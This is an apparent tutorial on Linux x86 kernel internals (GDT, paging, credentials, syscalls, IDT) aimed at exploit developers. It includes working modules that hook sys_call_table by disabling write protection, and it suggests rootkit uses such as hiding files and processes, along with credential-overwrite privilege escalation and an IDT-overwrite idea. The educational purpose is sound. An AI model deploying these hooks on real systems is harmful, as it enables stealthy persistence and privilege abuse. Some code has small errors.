EXPORT_PER_CPU_SYMBOL_GPL(gdt_page); A per-cpu variable gdt_page is initialized using the GDT_ENTRY_INIT macro. 
#define GDT_ENTRY_INIT(flags, base, limit) \ { \ .limit0 = (u16) (limit), \ .limit1 = ((limit) >> 16) & 0x0F, \ .base0 = (u16) (base), \ .base1 = ((base) >> 16) & 0xFF, \ .base2 = ((base) >> 24) & 0xFF, \ .type = (flags & 0x0f), \ .s = (flags >> 4) & 0x01, \ .dpl = (flags >> 5) & 0x03, \ .p = (flags >> 7) & 0x01, \ .avl = (flags >> 12) & 0x01, \ .l = (flags >> 13) & 0x01, \ .d = (flags >> 14) & 0x01, \ .g = (flags >> 15) & 0x01, \ }

This macro simply takes three arguments and splits them so that each descriptor field receives its part of the value. The GDT holds more entries on 32-bit than on 64-bit.

struct gdt_page { struct desc_struct gdt[GDT_ENTRIES]; } __attribute__((aligned(PAGE_SIZE)));

This says that gdt_page wraps an array of GDT_ENTRIES (32 on x86_32, 16 on x86_64) desc_struct entries, aligned to PAGE_SIZE (usually 4 KB, i.e. 4096 bytes).

struct desc_struct { u16 limit0; u16 base0; u16 base1: 8, type: 4, s: 1, dpl: 2, p: 1; u16 limit1: 4, avl: 1, l: 1, d: 1, g: 1, base2: 8; } __attribute__((packed));

When an ELF is about to run and is being loaded with load_elf_binary(), it calls setup_new_exec() and install_exec_creds() on bprm before it calls setup_arg_pages(), which picks a random stack pointer.
Before returning successfully, it would call finalize_exec() and start_thread() which would update the stack’s rlimit and begin execution respectively: void start_thread(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp) { start_thread_common(regs, new_ip, new_sp, __USER_CS, __USER_DS, 0); } EXPORT_SYMBOL_GPL(start_thread); As you are able to see, this function is just a wrapper around start_thread_common(): static void start_thread_common(struct pt_regs *regs, unsigned long new_ip, unsigned long new_sp, unsigned int _cs, unsigned int _ss, unsigned int _ds) { WARN_ON_ONCE(regs != current_pt_regs()); if (static_cpu_has(X86_BUG_NULL_SEG)) { loadsegment(fs, __USER_DS); load_gs_index(__USER_DS); } loadsegment(fs, 0); loadsegment(es, _ds); loadsegment(ds, _ds); load_gs_index(0); regs->ip = new_ip; regs->sp = new_sp; regs->cs = _cs; regs->ss = _ss; regs->flags = X86_EFLAGS_IF; force_iret(); } As a conclusion, every process starts with default segment registers, but different GPRs, stack and instruction pointer, and by looking at __USER_DS and __USER_CS: #define GDT_ENTRY_DEFAULT_USER_DS 5 #define GDT_ENTRY_DEFAULT_USER_CS 6 #define __USER_DS (GDT_ENTRY_DEFAULT_USER_DS*8 + 3) #define __USER_CS (GDT_ENTRY_DEFAULT_USER_CS*8 + 3) We would find the segment registers and their values on user-space: Initial state: CS = 6*8+3 = 0x33 SS = 5*8+3 = 0x2b DS = FS = ES = 0 These values can be checked using GDB and a dummy binary. (gdb) b* main Breakpoint 1 at 0x6b0 (gdb) r Starting program: /root/mod/cs Breakpoint 1, 0x00005555555546b0 in main () (gdb) info reg cs ss cs 0x33 51 ss 0x2b 43 Also, you should know that, CS holds in it’s least 2 significant bits, the Current Privilege Level(CPL), other segment selectors hold the Requested Privilege Level(RPL) instead of CPL. 
(gdb) p/t $cs $1 = 110011 (gdb) p/x $cs & 0b11 $2 = 0x3 # (Privilege Level: User(3) SuperUser(0)) (gdb) p/d $cs & ~0b1111 $3 = 48 # (Table Offset: 48) (gdb) p/d $cs & 0b100 $4 = 0 # (Table Indicator: GDT(0) LDT(1))

3 stands for the third ring, the least privileged, that is, user-space. It doesn’t change unless execution is in kernel-space, so it’s the same for both root and any normal user. So both RPL and CPL can be considered a form of limitation when accessing segments with a lower (more privileged) DPL (Descriptor Privilege Level).

When it comes to paging, its enable bit in CR0 (PG, #31) can only be set when the system is running in protected mode (the PE bit in CR0 is set), because in real mode, virtual addresses are equal to physical ones. Linux moved from four-level page tables to support five-level page tables by adding an additional layer (P4D), so the levels now are: PGD, P4D, PUD, PMD, PTE. PGD is the first level, the Page Global Directory; it is a pointer of type pgd_t *, and its definition is:

typedef struct { pgdval_t pgd; } pgd_t;

It holds a pgdval_t inside, which is an unsigned long (8 bytes on x86_64, 4 on x86_32):

typedef unsigned long pgdval_t;

To get to the next level, pgtable_l5_enabled() is called to check whether the CPU has X86_FEATURE_LA57 enabled.

#define pgtable_l5_enabled() cpu_feature_enabled(X86_FEATURE_LA57)

This can be seen in p4d_offset():

static inline p4d_t *p4d_offset(pgd_t *pgd, unsigned long address) { if (!pgtable_l5_enabled()) return (p4d_t *)pgd; return (p4d_t *)pgd_page_vaddr(*pgd) + p4d_index(address); }

If it isn’t enabled, it simply casts the pgd_t * to p4d_t * and returns it; otherwise it returns the P4D entry within the PGD that corresponds to the specific address. The P4D itself can then be used to find the next level, which is the PUD of type pud_t *; the PUD links to the PMD (Page Middle Directory) and the PMD to the PTE (Page Table Entry), which is the last level, is of type pte_t *, and contains the physical address of the page along with some protection flags.
Each process has its own virtual address space (mm_struct, vm_area_struct and pgd_t).

struct vm_area_struct { unsigned long vm_start; unsigned long vm_end; struct vm_area_struct *vm_next, *vm_prev; struct rb_node vm_rb; unsigned long rb_subtree_gap; struct mm_struct *vm_mm; pgprot_t vm_page_prot; unsigned long vm_flags; struct { struct rb_node rb; unsigned long rb_subtree_last; } shared; struct list_head anon_vma_chain; struct anon_vma *anon_vma; const struct vm_operations_struct *vm_ops; unsigned long vm_pgoff; struct file * vm_file; void * vm_private_data; atomic_long_t swap_readahead_info; #ifndef CONFIG_MMU struct vm_region *vm_region; #endif #ifdef CONFIG_NUMA struct mempolicy *vm_policy; #endif struct vm_userfaultfd_ctx vm_userfaultfd_ctx; } __randomize_layout; typedef struct { pgdval_t pgd; } pgd_t;

So duplicating all of this for every new process would be very expensive. Copy-on-Write (COW) helps here: the child starts as a clone of the parent process, and a page is only copied when a write hits one of the pages previously marked read-only. This happens on fork, more specifically in copy_process(), which duplicates the task_struct and performs specific operations depending on the flags passed to clone(), before copying all the parent’s information, which includes credentials, filesystem, files, namespaces, IO, Thread Local Storage, signals and address space.

As an example, the following module walks the VMAs in search of a user-specified address; once found, it gets its physical address and flags by walking the page tables.
#include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <asm/pgtable.h> #include <linux/highmem.h> #include <linux/slab.h> #define device_name "useless" #define SET_ADDRESS 0x00112233 char *us_buf; unsigned long address = 0; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ switch(cmd){ case SET_ADDRESS: address = arg; return 0; default: return -EINVAL; } } ssize_t do_read(struct file *filp, char *buf, size_t count, loff_t *offp){ int res, phys, flags; struct vm_area_struct *cmap; pgd_t *pgd; p4d_t *p4d; pud_t *pud; pmd_t *pmd; pte_t *ptep; /* Find corresponding VMA: vm_start <= address < vm_end */ cmap = current->mm->mmap; while(1){ if(cmap->vm_start <= address && address < cmap->vm_end){ break; } cmap = cmap->vm_next; if(cmap == NULL){ return -1; } }; /* Walking Page-tables for fun */ pgd = pgd_offset(current->mm, address); p4d = p4d_offset(pgd, address); pud = pud_offset(p4d, address); pmd = pmd_offset(pud, address); ptep = pte_offset_kernel(pmd, address); phys = *((int *) ptep); flags = phys & 0xfff; phys &= ~0xfff; snprintf(us_buf, 64, "PhysAddr(%x) VMAStart(%lx) Flags(%x)", phys, cmap->vm_start, flags); if(count > 64) count = 64; res = copy_to_user(buf, us_buf, count); return res; } struct file_operations fileops = { .owner = THIS_MODULE, .read = do_read, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; us_buf = kmalloc(64, GFP_KERNEL); if(us_buf == NULL){ printk(KERN_ERR "Couldn't reserve memory."); return -ENOMEM; } res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); kfree(us_buf); } MODULE_LICENSE("GPL"); module_init(us_init); module_exit(us_exit);

To communicate with this proc entry, the following was written:

#include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h>
#include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SET_ADDRESS 0x00112233 int main(void){ int fd; char *ok; char c[64]; fd = open(device_path, O_RDONLY); ok = malloc(512); memcpy(ok, "Welp", sizeof(int )); ioctl(fd, SET_ADDRESS, ok); read(fd, c, sizeof( c)); printf("%s\n", c); return 0; }

This gives a flags value of 0x867, which in binary is 100001100111:
Present: 1 (the page is present)
R/W: 1 (the page has both read and write permissions)
U/S: 1 (the page can be accessed by both user and supervisor)
00
Accessed: 1 (set if the page has been accessed)
Dirty: 1 (set if the page was written to since the last writeback)
0000

Note that the necessary checks on the validity of return values were ignored in this example; these could be performed with p??_none() and p??_present(). Multiple other things could have been done too, such as playing with the PFN or page, or reading from the physical address with void __iomem *, ioremap() and memcpy_fromio(), or with struct page * and kmap().

Translating addresses from virtual to physical takes time, so caching is implemented using the TLB (Translation Lookaside Buffer) to improve performance, in the hope that the next access lands a cache hit, which hands over the PTE faster than a miss, where a memory access is forced to happen to get it. The TLB is flushed from time to time; an example would be after a page fault is raised and handled.

Processes: The kernel sees each process as a struct task_struct, a huge struct containing many fields which we can’t cover entirely; some are used to guarantee (almost) fair scheduling, and some show the task’s state (whether it’s unrunnable, runnable or stopped), priority, the parent process, a linked list of child processes, the address space it holds, and many others. We are mainly interested in const struct cred __rcu *cred;, which holds the task’s credentials.
struct cred { atomic_t usage; #ifdef CONFIG_DEBUG_CREDENTIALS atomic_t subscribers; void *put_addr; unsigned magic; #define CRED_MAGIC 0x43736564 #define CRED_MAGIC_DEAD 0x44656144 #endif kuid_t uid; kgid_t gid; kuid_t suid; kgid_t sgid; kuid_t euid; kgid_t egid; kuid_t fsuid; kgid_t fsgid; unsigned securebits; kernel_cap_t cap_inheritable; kernel_cap_t cap_permitted; kernel_cap_t cap_effective; kernel_cap_t cap_bset; kernel_cap_t cap_ambient; #ifdef CONFIG_KEYS unsigned char jit_keyring; struct key __rcu *session_keyring; struct key *process_keyring; struct key *thread_keyring; struct key *request_key_auth; #endif #ifdef CONFIG_SECURITY void *security; #endif struct user_struct *user; struct user_namespace *user_ns; struct group_info *group_info; struct rcu_head rcu; } __randomize_layout; This struct holds Capabilities, ((effective) user and group) ID, keyrings, (for synchronization, Read-Copy-Update) RCU, (tracks the user’s usage of the system by keeping counts) user and (holds U/G ID and the privileges for them) user_ns. In order to better understand this structure, a simple proc entry was created which extracts the task_struct of the process that uses it(current) and reads the effective UID and GID. 
#include <linux/module.h> #include <linux/kernel.h> #include <linux/proc_fs.h> #include <linux/sched.h> #include <linux/uaccess.h> #include <linux/cred.h> #include <linux/uidgid.h> #define device_name "useless" #define SD_PRIV 0x10071007 struct{ kuid_t ceuid; kgid_t cegid; spinlock_t clock; }us_cd; long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ int res; switch(cmd){ case SD_PRIV: spin_lock(&us_cd.clock); current_euid_egid(&us_cd.ceuid, &us_cd.cegid); spin_unlock(&us_cd.clock); res = copy_to_user((void *)arg, &us_cd, 8); return res; default: return -EINVAL; } } struct file_operations fileops = { .owner = THIS_MODULE, .unlocked_ioctl = do_ioctl, }; static int us_init(void){ struct proc_dir_entry *res; spin_lock_init(&us_cd.clock); res = proc_create(device_name, 0, NULL, &fileops); if(res == NULL){ printk(KERN_ERR "Failed allocating a proc entry."); return -ENOMEM; } return 0; } static void us_exit(void){ remove_proc_entry(device_name, NULL); } MODULE_LICENSE("GPU"); module_init(us_init); module_exit(us_exit); The initialization process starts by preparing the spinlock and creating a proc entry with a specified name “useless” and a file_operations struct containing only necessary owner and unlocked_ioctl entries. While the ioctl handler simply checks if the command passed was SD_PRIV to extract the UID and GID with a call to the current_euid_egid() macro which in turn calls current_cred() to extract the current->cred: #define current_euid_egid(_euid, _egid) \ do { \ const struct cred *__cred; \ __cred = current_cred(); \ *(_euid) = __cred->euid; \ *(_egid) = __cred->egid; \ } while(0) #define current_cred() \ rcu_dereference_protected(current->cred, 1) Then, we create a tasktry.c to interract with the /proc/useless. 
#include <stdio.h> #include <string.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #define device_path "/proc/useless" #define SD_PRIV 0x10071007 struct{ unsigned int uid; unsigned int gid; }data; int main(void){ int fd; fd = open(device_path, O_RDONLY); ioctl(fd, SD_PRIV, &data); printf("UID: %d GID: %d\n", data.uid, data.gid); return 0; }

Two binaries are then created in the /tmp directory: tasktry_root, compiled by root with the setuid bit set, and tasktry_user, compiled by a normal user.

root@Nwwz:~# cd /tmp root@Nwwz:/tmp# gcc tasktry.c -o tasktry_root; chmod u+s tasktry_root root@Nwwz:/tmp# cd /root/mod root@Nwwz:~/mod# make make -C /lib/modules/4.17.0/build M=/root/mod modules make[1]: Entering directory '/usr/src/linux-4.17.2' CC [M] /root/mod/task.o Building modules, stage 2. MODPOST 1 modules CC /root/mod/task.mod.o LD [M] /root/mod/task.ko make[1]: Leaving directory '/usr/src/linux-4.17.2' root@Nwwz:~/mod# insmod task.ko root@Nwwz:~/mod# su - user user@Nwwz:~$ cd /tmp user@Nwwz:/tmp$ gcc tasktry.c -o tasktry_user user@Nwwz:/tmp$ ls tasktry_user tasktry_root tasktry.c user@Nwwz:/tmp$ ./tasktry_root UID: 0 GID: 1000 user@Nwwz:/tmp$ ./tasktry_user UID: 1000 GID: 1000

As you can see, the effective UID of tasktry_root is 0, which gives it high privileges, so overwriting the effective creds is one way to escalate privileges (prepare_kernel_cred() and commit_creds() are used for this purpose in most exploits, instead of getting the stack base and overwriting it directly); another is to change capabilities. On Windows, one way to escalate privileges would be to steal the token of the System process (PID 4) and assign it to the newly spawned cmd.exe after changing the reference count. [image]

Syscalls: Processes running in userspace can still communicate with the kernel, thanks to syscalls.
Each syscall is defined as follows: SYSCALL_DEFINE0(getpid) { return task_tgid_vnr(current); } With multiple arguments: SYSCALL_DEFINE3(lseek, unsigned int, fd, off_t, offset, unsigned int, whence) { return ksys_lseek(fd, offset, whence); } So, in general: SYSCALL_DEFINE[ARG_COUNT]([SYSCALL_NAME], [ARG_TYPE], [ARG_NAME]){ /* Passing the argument to another function, for processing. */ return call_me([ARG_NAME]); } Few tries aaand : #include <stdio.h> #include <string.h> #include <unistd.h> int main(void){ printf("ID: %d\n", getuid()); return 0; } Running this sample with GDB and putting breakpoint on the x64 libc, we can see that it does set EAX register to 0x66(syscall number on x64) before the syscall instruction. (gdb) x/i $rip => 0x555555554704 <main+4>: callq 0x5555555545a0 <getuid@plt> (gdb) x/x getuid 0x7ffff7af2f30 <getuid>: 0x000066b8 (gdb) b* getuid Breakpoint 2 at 0x7ffff7af2f30: file ../sysdeps/unix/syscall-template.S, line 65. (gdb) c Continuing. Breakpoint 2, getuid () at ../sysdeps/unix/syscall-template.S:65 65 ../sysdeps/unix/syscall-template.S: No such file or directory. (gdb) disas $rip Dump of assembler code for function getuid: => 0x00007ffff7af2f30 <+0>: mov $0x66,%eax 0x00007ffff7af2f35 <+5>: syscall 0x00007ffff7af2f37 <+7>: retq End of assembler dump. (gdb) shell root@Nwwz:~# echo "g" > /proc/sysrq-trigger We can invoke a shell from GDB to force SysRQ, and see what this offset in the kernel links for: [New Thread 756] [New Thread 883] [New Thread 885] Thread 103 received signal SIGTRAP, Trace/breakpoint trap. 
[Switching to Thread 889] kgdb_breakpoint () at kernel/debug/debug_core.c:1073 10733 wmb(); /* Sync point after breakpoint */ (gdb) p &sys_call_table $1 = (const sys_call_ptr_t (*)[]) 0xffffffff81c00160 <sys_call_table> (gdb) x/gx (void *)$1 + 0x66*8 0xffffffff81c00490 <sys_call_table+816>: 0xffffffff8108ec60 (gdb) x/i 0xffffffff8108ec60 0xffffffff8108ec60 <__x64_sys_getuid>: nopl 0x0(%rax,%rax,1) So, it’s the global sys_call_table, indexing the __x64_sys_getuid there. "The __x64_sys_*() stubs are created on-the-fly for sys_*() system calls" is written in syscall_64.tbl that contains all the syscalls available to the kernel. This is similiar to the nt!KiServiceTable on Windows. kd> dps nt!KeServiceDescriptorTable 82b759c0 82a89d9c nt!KiServiceTable 82b759c4 00000000 82b759c8 00000191 82b759cc 82a8a3e4 nt!KiArgumentTable 82b759d0 00000000 82b759d4 00000000 kd> dd nt!KiServiceTable 82a89d9c 82c85c28 82acc40d 82c15b68 82a3088a 82a89dac 82c874ff 82b093fa 82cf7b05 82cf7b4e 82a89dbc 82c0a3bd 82d11368 82d125c1 82c00b95 kd> ln 82c85c28 (82c85c28) nt!NtAcceptConnectPort | (82c85ca5) nt!EtwpRundownNotifications Exact matches: nt!NtAcceptConnectPort = <no type information> kd> ln 82acc40d (82acc40d) nt!NtAccessCheck | (82acc43e) nt!PsGetThreadId Exact matches: nt!NtAccessCheck = <no type information> kd> ln 82d125c1 (82d125c1) nt!NtAddDriverEntry | (82d125f3) nt!NtDeleteDriverEntry Exact matches: nt!NtAddDriverEntry = <no type information> Dissasembling it gives us: (gdb) disas __x64_sys_getuid Dump of assembler code for function __x64_sys_getuid: 0xffffffff8108ec60 <+0>: nopl 0x0(%rax,%rax,1) 0xffffffff8108ec65 <+5>: mov %gs:0x15c00,%rax 0xffffffff8108ec6e <+14>: mov 0x668(%rax),%rax 0xffffffff8108ec75 <+21>: mov 0x4(%rax),%esi 0xffffffff8108ec78 <+24>: mov 0x88(%rax),%rdi 0xffffffff8108ec7f <+31>: callq 0xffffffff8112d4a0 <from_kuid_munged> 0xffffffff8108ec84 <+36>: mov %eax,%eax 0xffffffff8108ec86 <+38>: retq With a basic understanding of ASM and a very limited knowledge 
of the kernel (AT&T syntax, haha, too lazy to switch it), one can tell that it first fetches the current task, loads the pointer it holds at offset 0x668 into RAX, then dereferences it again and uses the contents at +0x88 (RDI) and +0x4 (ESI) as arguments to the from_kuid_munged() call, before zero-extending the result (mov %eax,%eax) and returning (the q suffix stands for qword). We can verify this either by looking at the source:

SYSCALL_DEFINE0(getuid) { return from_kuid_munged(current_user_ns(), current_uid()); } uid_t from_kuid_munged(struct user_namespace *targ, kuid_t kuid) { uid_t uid; uid = from_kuid(targ, kuid); if (uid == (uid_t) -1) uid = overflowuid; return uid; } EXPORT_SYMBOL(from_kuid_munged);

Or by checking in GDB (maybe both?):

(gdb) b* __x64_sys_getuid Breakpoint 1 at 0xffffffff8108ec60: file kernel/sys.c, line 920. (gdb) c [New Thread 938] [Switching to Thread 938] Thread 122 hit Breakpoint 1, __x64_sys_getuid () at kernel/sys.c:920 920 { (gdb) ni get_current () at ./arch/x86/include/asm/current.h:15 15 return this_cpu_read_stable(current_task); (gdb) x/i $rip => 0xffffffff8108ec65 <__x64_sys_getuid+5>: mov %gs:0x15c00,%rax (gdb) p ((struct task_struct *)0)->cred Cannot access memory at address 0x668 (gdb) p ((struct cred *)0)->uid Cannot access memory at address 0x4 (gdb) p ((struct cred *)0)->user_ns Cannot access memory at address 0x88

The sys_call_table resides in an RO (read-only) memory region:

(gdb) x/x sys_call_table 0xffffffff81c00160 <sys_call_table>: 0xffffffff81247310 (gdb) maintenance info sections ... [3] 0xffffffff81c00000->0xffffffff81ec1a42 at 0x00e00000: .rodata ALLOC LOAD RELOC DATA HAS_CONTENTS ... (gdb)

But a kernel module can overcome this protection and place a hook on any system call. For that, two example modules will be given:

=] Disabling the previously discussed WP (write-protect) bit in CR0 (control register #0), using read_cr0 and write_cr0 to achieve that.
#include <linux/fs.h> #include <asm/pgtable.h> #include <linux/module.h> #include <linux/kernel.h> #include <linux/uaccess.h> #include <linux/kallsyms.h> #include <linux/miscdevice.h> #include <asm/special_insns.h> #define device_name "hookcontrol" #define ioctl_base 0x005ec #define ioctl_enable ioctl_base+1 #define ioctl_disable ioctl_base+2 int res; int (*real_getuid)(void); void **sys_call_table; unsigned long const *address; static int hooked_getuid(void){ printk(KERN_INFO "Received getuid call from %s!", current->comm); if(real_getuid != NULL){ return real_getuid(); } return 0; } long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ unsigned long cr0 = read_cr0(); switch(cmd){ case ioctl_enable: printk(KERN_INFO "Enabling hook!"); write_cr0(cr0 & ~0x10000); sys_call_table[__NR_getuid] = hooked_getuid; write_cr0(cr0 | 0x10000); printk(KERN_INFO "Successfully changed!"); return 0; case ioctl_disable: printk(KERN_INFO "Disabling hook!"); write_cr0(cr0 & ~0x10000); sys_call_table[__NR_getuid] = real_getuid; write_cr0(cr0 | 0x10000); printk(KERN_INFO "Successfully restored!"); return 0; default: return -EINVAL; } } struct file_operations file_ops = { .owner = THIS_MODULE, .unlocked_ioctl = do_ioctl }; struct miscdevice hk_dev = { MISC_DYNAMIC_MINOR, device_name, &file_ops }; static int us_init(void){ res = misc_register(&hk_dev); if(res){ printk(KERN_ERR "Couldn't load module!"); return -1; } sys_call_table = (void *) kallsyms_lookup_name("sys_call_table"); real_getuid = sys_call_table[__NR_getuid]; address = (unsigned long *) &sys_call_table; printk(KERN_INFO "Module successfully loaded with minor: %d!", hk_dev.minor); return 0; } static void us_exit(void){ misc_deregister(&hk_dev); } MODULE_LICENSE("GPL"); module_init(us_init); module_exit(us_exit); =] Orr’ing the protection mask of the page at which it resides(__pgprot(_PAGE_RW))( set_memory_rw() & set_memory_rw()), or directly modifying the PTE. 
static inline pte_t pte_mkwrite(pte_t pte) { return pte_set_flags(pte, _PAGE_RW); } static inline pte_t pte_wrprotect(pte_t pte) { return pte_clear_flags(pte, _PAGE_RW); } Looking at these functions, one can safely assume that manipulation can be acheived with simple OR and AND(_PAGE_RW) operations on the pte_t. pte_t *lookup_address(unsigned long address, unsigned int *level) { return lookup_address_in_pgd(pgd_offset_k(address), address, level); } Since it’s a kernel address, pgd_offset_k() is called, which makes use of &init_mm, instead of a mm_struct belonging to some process of one’s choice. pte_t *lookup_address_in_pgd(pgd_t *pgd, unsigned long address, unsigned int *level) { p4d_t *p4d; pud_t *pud; pmd_t *pmd; *level = PG_LEVEL_NONE; if (pgd_none(*pgd)) return NULL; p4d = p4d_offset(pgd, address); if (p4d_none(*p4d)) return NULL; *level = PG_LEVEL_512G; if (p4d_large(*p4d) || !p4d_present(*p4d)) return (pte_t *)p4d; pud = pud_offset(p4d, address); if (pud_none(*pud)) return NULL; *level = PG_LEVEL_1G; if (pud_large(*pud) || !pud_present(*pud)) return (pte_t *)pud; pmd = pmd_offset(pud, address); if (pmd_none(*pmd)) return NULL; *level = PG_LEVEL_2M; if (pmd_large(*pmd) || !pmd_present(*pmd)) return (pte_t *)pmd; *level = PG_LEVEL_4K; return pte_offset_kernel(pmd, address); } so, the ioctl handler looks like this: long do_ioctl(struct file *filp, unsigned int cmd, unsigned long arg){ unsigned int level; pte_t *pte = lookup_address(*address, &level);; switch(cmd){ case ioctl_enable: printk(KERN_INFO "Enabling hook!"); pte->pte |= _PAGE_RW; sys_call_table[__NR_getuid] = hooked_getuid; pte->pte &= ~_PAGE_RW; printk(KERN_INFO "Successfully changed!"); return 0; case ioctl_disable: printk(KERN_INFO "Disabling hook!"); pte->pte |= _PAGE_RW; sys_call_table[__NR_getuid] = real_getuid; pte->pte &= ~_PAGE_RW; printk(KERN_INFO "Successfully restored!"); return 0; default: return -EINVAL; } } (Know that these are only examples, usually, replacing should take place at init 
and restoring the original at exit; plus, the definitions of both the hook and the original handler should carry asmlinkage (passing arguments on the stack, unlike the default fastcall, which uses registers). However, since the syscall here takes no arguments, this was ignored.)

By running an application from user-space to interact with /dev/hookcontrol (enabling the hook, then disabling it after a while), we can then take a look at dmesg to watch the hook at work.

This can be used to provide a layer on top of a syscall, to block it or manipulate its return value: kill to prevent a process from being killed, getdents to hide some files, unlink to prevent a file from being deleted, et cetera. And it doesn’t stop here: even without syscall hooking, one can play with processes (hide them, for example) through task_struct elements and per-task flags, or change the file_operations in some specific struct, among many other possibilities.

IDT (Interrupt Descriptor Table): This table exists in order to handle exceptions; by linking a specific handler to each exception, it helps deal with those raised from userspace (a transition to ring zero is required first) and from kernelspace. It is first initialized during early setup, which can be seen in setup_arch(); it calls multiple functions, some of which set up the IDT, and the most important to us is idt_setup_traps():

void __init idt_setup_traps(void) { idt_setup_from_table(idt_table, def_idts, ARRAY_SIZE(def_idts), true); }

It makes use of the default IDTs array (def_idts).
static const __initconst struct idt_data def_idts[] = { INTG(X86_TRAP_DE, divide_error), INTG(X86_TRAP_NMI, nmi), INTG(X86_TRAP_BR, bounds), INTG(X86_TRAP_UD, invalid_op), INTG(X86_TRAP_NM, device_not_available), INTG(X86_TRAP_OLD_MF, coprocessor_segment_overrun), INTG(X86_TRAP_TS, invalid_TSS), INTG(X86_TRAP_NP, segment_not_present), INTG(X86_TRAP_SS, stack_segment), INTG(X86_TRAP_GP, general_protection), INTG(X86_TRAP_SPURIOUS, spurious_interrupt_bug), INTG(X86_TRAP_MF, coprocessor_error), INTG(X86_TRAP_AC, alignment_check), INTG(X86_TRAP_XF, simd_coprocessor_error), #ifdef CONFIG_X86_32 TSKG(X86_TRAP_DF, GDT_ENTRY_DOUBLEFAULT_TSS), #else INTG(X86_TRAP_DF, double_fault), #endif INTG(X86_TRAP_DB, debug), #ifdef CONFIG_X86_MCE INTG(X86_TRAP_MC, &machine_check), #endif SYSG(X86_TRAP_OF, overflow), #if defined(CONFIG_IA32_EMULATION) SYSG(IA32_SYSCALL_VECTOR, entry_INT80_compat), #elif defined(CONFIG_X86_32) SYSG(IA32_SYSCALL_VECTOR, entry_INT80_32), #endif };

On x86_32, as an example, when an int 0x80 is raised, the following happens:

static __always_inline void do_syscall_32_irqs_on(struct pt_regs *regs) { struct thread_info *ti = current_thread_info(); unsigned int nr = (unsigned int)regs->orig_ax; #ifdef CONFIG_IA32_EMULATION ti->status |= TS_COMPAT; #endif if (READ_ONCE(ti->flags) & _TIF_WORK_SYSCALL_ENTRY) { nr = syscall_trace_enter(regs); } if (likely(nr < IA32_NR_syscalls)) { nr = array_index_nospec(nr, IA32_NR_syscalls); #ifdef CONFIG_IA32_EMULATION regs->ax = ia32_sys_call_table[nr](regs); #else regs->ax = ia32_sys_call_table[nr]( (unsigned int)regs->bx, (unsigned int)regs->cx, (unsigned int)regs->dx, (unsigned int)regs->si, (unsigned int)regs->di, (unsigned int)regs->bp); #endif } syscall_return_slowpath(regs); } __visible void do_int80_syscall_32(struct pt_regs *regs) { enter_from_user_mode(); local_irq_enable(); do_syscall_32_irqs_on(regs); }

It calls enter_from_user_mode(), then enables Interrupt Requests (IRQs) on the current CPU.
It then uses the saved registers to find the syscall number (EAX) and uses it as an index into the ia32_sys_call_table array. Arguments are passed to the handler in registers, in the following order: EBX, ECX, EDX, ESI, EDI, EBP.

However, the first object seen in the idt_table is X86_TRAP_DE (divide error). GDB shows that the first gate within idt_table holds the offset_high, offset_middle and offset_low referencing divide_error, which deals with division-by-zero exceptions.

(gdb) p idt_table $1 = 0xffffffff82598000 <idt_table> (gdb) p/x *(idt_table + 0x10*0) $2 = {offset_low = 0xb90, segment = 0x10, bits = {ist = 0x0, zero = 0, type = 14, dpl = 0, p = 1}, offset_middle = 0x8180, offset_high = 0xffffffff, reserved = 0x0} (gdb) x/8i 0xffffffff81800b90 0xffffffff81800b90 <divide_error>: nopl (%rax) 0xffffffff81800b93 <divide_error+3>: pushq $0xffffffffffffffff 0xffffffff81800b95 <divide_error+5>: callq 0xffffffff81801210 <error_entry> 0xffffffff81800b9a <divide_error+10>: mov %rsp,%rdi 0xffffffff81800b9d <divide_error+13>: xor %esi,%esi 0xffffffff81800b9f <divide_error+15>: callq 0xffffffff81025d60 <do_divide_error> 0xffffffff81800ba4 <divide_error+20>: jmpq 0xffffffff81801310 <error_exit>

You can see that its DPL is zero, that is, an int $0x00 from a userland process wouldn’t help reaching it (unlike int $0x03, int $0x04 or int $0x80). Gate descriptors are initialized in idt_setup_from_table(), which calls idt_init_desc():

idt_setup_from_table(gate_desc *idt, const struct idt_data *t, int size, bool sys) { gate_desc desc; for (; size > 0; t++, size--) { idt_init_desc(&desc, t); write_idt_entry(idt, t->vector, &desc); if (sys) set_bit(t->vector, system_vectors); } }

And here it is.
static inline void idt_init_desc(gate_desc *gate, const struct idt_data *d) { unsigned long addr = (unsigned long) d->addr; gate->offset_low = (u16) addr; gate->segment = (u16) d->segment; gate->bits = d->bits; gate->offset_middle = (u16) (addr >> 16); #ifdef CONFIG_X86_64 gate->offset_high = (u32) (addr >> 32); gate->reserved = 0; #endif }

An attacker could abuse this, for example by getting the IDT address using the SIDT instruction and looking for a specific handler in the list; since offset_high is 0xffffffff for kernel handlers, incrementing it would wrap it around to 0, moving the handler address into the userspace range.

"As we said above, we're going to use the IDT and overwrite one of its entries (more precisely a Trap Gate, so that we're able to hijack an exception handler and redirect the code-flow towards userspace). Each IDT entry is 64-bit (8-bytes) long and we want to overflow the 'base_offset' value of it, to be able to modify the MSB of the exception handler routine address and thus redirect it below PAGE_OFFSET (0xc0000000) value." ~ Phrack 2

KSPP: This protection appeared starting from 4.8; its name is short for “Kernel Self-Protection Project”. It provides additional checks on copy_to_user() and copy_from_user() to prevent classic buffer-overflow bugs, by checking the compile-time buffer size and making sure the copy fits. If it does not, it aborts and prevents any possible exploitation from happening.
root@Nwwz:~/mod# cd /usr/src
root@Nwwz:/usr/src# cd linux-4.17.2
root@Nwwz:/usr/src/linux-4.17.2# cd include
root@Nwwz:/usr/src/linux-4.17.2/include# nano uaccess.h

We can directly see a check, marked likely() to succeed, before the copy operation proceeds:

static __always_inline unsigned long __must_check
copy_from_user(void *to, const void __user *from, unsigned long n)
{
    if (likely(check_copy_size(to, n, false)))
        n = _copy_from_user(to, from, n);
    return n;
}

static __always_inline unsigned long __must_check
copy_to_user(void __user *to, const void *from, unsigned long n)
{
    if (likely(check_copy_size(from, n, true)))
